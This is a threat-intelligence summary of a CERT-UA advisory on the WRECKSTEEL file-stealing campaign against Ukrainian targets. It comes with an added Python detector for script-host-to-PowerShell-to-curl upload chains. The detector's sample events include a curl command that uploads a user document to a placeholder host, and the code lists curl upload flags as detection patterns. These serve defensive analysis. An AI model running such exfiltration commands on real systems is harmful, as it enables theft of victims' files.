Cyber Espionage using PowerShell stealer WRECKSTEEL
Essential information
- Published: 03/04/2025 18:27
- Modified: 03/04/2025 19:04
- Tags: 2025-04-03, critical-infrastructure, cyber espionage, file stealing, government, powershell, ukraine, vbscript, wrecksteel
- Related entities: 71 observables, 1 intrusion set (APT), 9 techniques (MITRE), 1 malware, 2 others
Description
Ukraine's government computer emergency response team, CERT-UA, has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, use compromised accounts to distribute emails carrying links to public file-sharing services. The links deliver a VBScript loader, which launches a PowerShell script that searches for specific file types and uploads them using cURL. The activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files built with NSIS installers that contained decoy documents and the IrfanView program, used to take screenshots. CERT-UA urges immediate reporting of any detected signs of a cyberattack.
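The execution chain described above (a script host running the VBScript loader, which starts PowerShell, which invokes cURL to upload files) leaves a recognisable parent-child pattern in process-creation telemetry. The following is an added detection example, not CERT-UA's tooling or any indicator from the case: it walks a process tree built from constructed Sysmon-style events and flags a curl.exe upload whose ancestry contains both a PowerShell host and a script host. The event field names, process ids, paths and the upload host are all constructed for illustration; the chain shape (wscript.exe -> powershell.exe -> curl.exe) is assumed from the advisory's description rather than quoted from it.

```python
"""Process-tree detection for the file-stealing chain described above:
script host (VBScript) -> PowerShell -> curl.exe upload.

Added illustration, not CERT-UA tooling. Event format and sample values are
constructed; no real indicators from the case are used.
"""
from typing import Dict, Iterator, List

# Constructed process-creation events in a simplified Sysmon-like shape.
# pid/ppid link child to parent; ppid 812 has no event, so the walk stops there.
SAMPLE_EVENTS: List[Dict] = [
    {"ts": "2025-03-12T09:01:03Z", "pid": 4100, "ppid": 812,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"ts": "2025-03-12T09:01:10Z", "pid": 4212, "ppid": 4100,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\document.vbs"'},
    {"ts": "2025-03-12T09:01:11Z", "pid": 4300, "ppid": 4212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\u\AppData\Local\Temp\s.ps1"},
    {"ts": "2025-03-12T09:01:40Z", "pid": 4388, "ppid": 4300,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -F "file=@C:\Users\u\Documents\report.docx" https://upload.example/u'},
    # Benign: an interactive PowerShell session downloading a file with curl.
    {"ts": "2025-03-12T09:05:00Z", "pid": 5000, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"ts": "2025-03-12T09:05:30Z", "pid": 5012, "ppid": 5000,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o tool.zip https://example.com/tool.zip"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# curl options that send a local file outbound as a form part or upload body.
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file"}
# curl options that send a request body; '@path' reads that body from a file.
BODY_FLAGS = {"-d", "--data", "--data-binary"}


def basename(image: str) -> str:
    """Lower-cased file name of an image path (Windows or POSIX separators)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def curl_uploads(cmdline: str) -> bool:
    """True when the curl command line sends local file content to a server."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok in UPLOAD_FLAGS:
            return True
        if tok in BODY_FLAGS and i + 1 < len(tokens):
            if tokens[i + 1].lstrip("\"'").startswith("@"):
                return True
    return False


def ancestors(by_pid: Dict[int, Dict], ppid: int, max_depth: int = 16) -> Iterator[str]:
    """Yield ancestor image names from the immediate parent upward."""
    depth = 0
    while ppid in by_pid and depth < max_depth:
        parent = by_pid[ppid]
        yield basename(parent["image"])
        ppid = parent["ppid"]
        depth += 1


def detect_stealer_chain(events: List[Dict]) -> List[Dict]:
    """Flag curl uploads whose ancestry contains both a PowerShell host and a
    script host, i.e. the loader -> script -> upload chain the advisory describes."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "curl.exe" or not curl_uploads(e["cmdline"]):
            continue
        chain = list(ancestors(by_pid, e["ppid"]))
        if SHELLS.intersection(chain) and SCRIPT_HOSTS.intersection(chain):
            alerts.append({"ts": e["ts"], "pid": e["pid"],
                           "chain": ["curl.exe"] + chain,
                           "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_stealer_chain(SAMPLE_EVENTS):
        print(alert["ts"], alert["pid"], " <- ".join(alert["chain"]))
```

The benign curl download from an interactive PowerShell session is not flagged, because it neither uploads nor descends from a script host. In production telemetry the tree should be keyed on process GUIDs rather than pids (pids are reused), and the same ancestry check is worth extending to PowerShell-native upload cmdlets, since the advisory notes the stealer also exists as a pure PowerShell variant.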